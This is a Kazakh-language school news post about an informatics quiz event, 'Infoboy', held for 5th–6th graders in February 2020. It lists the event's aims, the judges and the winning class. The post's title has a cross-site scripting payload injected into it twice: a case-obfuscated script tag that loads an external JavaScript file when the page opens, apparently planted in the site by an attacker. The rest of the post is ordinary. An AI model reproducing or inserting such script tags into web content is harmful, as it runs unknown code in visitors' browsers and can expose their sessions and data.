Информатика пәнінен "Инфобой" сыныптан тыс іс-шара<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

26.02.2020

Бүгін, 26 ақпан күні МИФ онкүндігі аясында 5-6 сынып оқушылары арасында  Амирова Ж. Б. информатика пәнінен "Инфобой"атты сыныптан тыс іс-шара өткізді. 

Іс-шараның мақсаттары :

  • Информатика пәнінен оқушылардың білімін жалпылау;
  • Танымдық процестерді дамыту, есте сақтау, қиял, логикалық ойлау, зейінділік, бақылау, зеректілік;
  • Оқушылардың стандартты емес міндеттерге және оқу пәніне қызығушылығын арттыру;
  • Оқу-жаттығудың оң мотивін қалыптастыру және топта жұмыс істей білу

Іс-шара барысында оқушыларға информатикадан әртүрлі тапсырмалар ұсынылды: ребустар, шарадтар, сұрақтар. Оқушылар ойынға белсене қатысып, информатика пәні бойынша өз білімдерін көрсете алды. Бағалау қазылар алқасы мүшелері: Жакина Р. Т., Тулеуова Г. К., Тлесова А. С. жүргізді. Ойын қорытындысы бойынша 5 "а" сынып оқушылары жеңімпаз атанды. Құттықтаймыз! Алдағы уақытта жеңістер тілейміз.

Просмотров: 716


Пікір қосу



Деректерді қолтаңбаға қосу